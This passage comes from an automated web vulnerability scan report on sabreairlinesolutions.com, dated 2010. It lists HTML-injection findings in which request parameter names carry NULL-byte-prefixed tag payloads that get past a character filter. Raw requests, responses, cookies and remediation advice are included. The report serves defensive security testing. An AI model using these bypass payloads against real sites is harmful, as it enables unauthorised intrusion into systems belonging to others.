This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/past_editions?%003813b<a>beec50d4773=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321543; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:53:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321543; expires=Thu, 06-Oct-2011 09:53:29 GMT; path=/
Set-Cookie: exp_last_activity=1286376803; expires=Thu, 06-Oct-2011 09:53:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fpast_editions%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:53:42 GMT
Pragma: no-cache
Content-Length: 7732
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>beec50d4773=1">past editions?%003813b<a>beec50d4773=1</a>
...[SNIP]...

3.32. http://www.sabreairlinesolutions.com/home/ascend/past_editions [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/past_editions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00bfa83"><a>c79bbe5d840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfa83"><a>c79bbe5d840 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/past_editions?%00bfa83"><a>c79bbe5d840=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321543; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:48:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321543; expires=Thu, 06-Oct-2011 09:48:24 GMT; path=/
Set-Cookie: exp_last_activity=1286376504; expires=Thu, 06-Oct-2011 09:48:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fpast_editions%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:48:37 GMT
Pragma: no-cache
Content-Length: 7736
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/past_editions?%00bfa83"><a>c79bbe5d840=1">
...[SNIP]...

3.33. http://www.sabreairlinesolutions.com/home/ascend/past_editions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/past_editions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00b1d68<a>0439c7c0b28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1d68<a>0439c7c0b28 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/past_editions/?%00b1d68<a>0439c7c0b28=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321341; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:34:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321341; expires=Thu, 06-Oct-2011 09:34:43 GMT; path=/
Set-Cookie: exp_last_activity=1286375683; expires=Thu, 06-Oct-2011 09:34:43 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fpast_editions%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:35:02 GMT
Pragma: no-cache
Content-Length: 7780
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>0439c7c0b28=1">?%00b1d68<a>0439c7c0b28=1</a>
...[SNIP]...

3.34. http://www.sabreairlinesolutions.com/home/ascend/past_editions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/past_editions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005f440"><a>15f7641391c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f440"><a>15f7641391c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/past_editions/?%005f440"><a>15f7641391c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321341; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:29:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321341; expires=Thu, 06-Oct-2011 09:29:19 GMT; path=/
Set-Cookie: exp_last_activity=1286375359; expires=Thu, 06-Oct-2011 09:29:19 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fpast_editions%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:29:39 GMT
Pragma: no-cache
Content-Length: 7784
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/past_editions/?%005f440"><a>15f7641391c=1">
...[SNIP]...

3.35. http://www.sabreairlinesolutions.com/home/ascend/subscribe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/subscribe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00bb836<a>0b6cf4318e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb836<a>0b6cf4318e4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/subscribe?%00bb836<a>0b6cf4318e4=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321377; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:49:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321377; expires=Thu, 06-Oct-2011 09:49:12 GMT; path=/
Set-Cookie: exp_last_activity=1286376552; expires=Thu, 06-Oct-2011 09:49:12 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:49:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26514


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>0b6cf4318e4=1">subscribe?%00bb836<a>0b6cf4318e4=1</a>
...[SNIP]...

3.36. http://www.sabreairlinesolutions.com/home/ascend/subscribe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/subscribe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0091ac9"><a>933075383e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91ac9"><a>933075383e5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/subscribe?%0091ac9"><a>933075383e5=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321377; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:44:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321377; expires=Thu, 06-Oct-2011 09:44:13 GMT; path=/
Set-Cookie: exp_last_activity=1286376252; expires=Thu, 06-Oct-2011 09:44:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:44:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26518


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/subscribe?%0091ac9"><a>933075383e5=1">
...[SNIP]...

3.37. http://www.sabreairlinesolutions.com/home/ascend/subscribe/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/subscribe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00e964d<a>cff7214ce32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e964d<a>cff7214ce32 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/subscribe/?%00e964d<a>cff7214ce32=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321333; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A1%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:40:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321333; expires=Thu, 06-Oct-2011 09:40:21 GMT; path=/
Set-Cookie: exp_last_activity=1286376020; expires=Thu, 06-Oct-2011 09:40:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:40:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>cff7214ce32=1">?%00e964d<a>cff7214ce32=1</a>
...[SNIP]...

3.38. http://www.sabreairlinesolutions.com/home/ascend/subscribe/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/subscribe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dd50a"><a>ad2e0e8eeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd50a"><a>ad2e0e8eeb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/subscribe/?%00dd50a"><a>ad2e0e8eeb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321333; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A1%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:35:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321333; expires=Thu, 06-Oct-2011 09:35:57 GMT; path=/
Set-Cookie: exp_last_activity=1286375757; expires=Thu, 06-Oct-2011 09:35:57 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:36:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26560


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/subscribe/?%00dd50a"><a>ad2e0e8eeb=1">
...[SNIP]...

3.39. http://www.sabreairlinesolutions.com/home/business_issues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d1fb2"><a>4652b7d32bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1fb2"><a>4652b7d32bc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues?%00d1fb2"><a>4652b7d32bc=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:37:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318265; expires=Wed, 05-Oct-2011 17:37:45 GMT; path=/
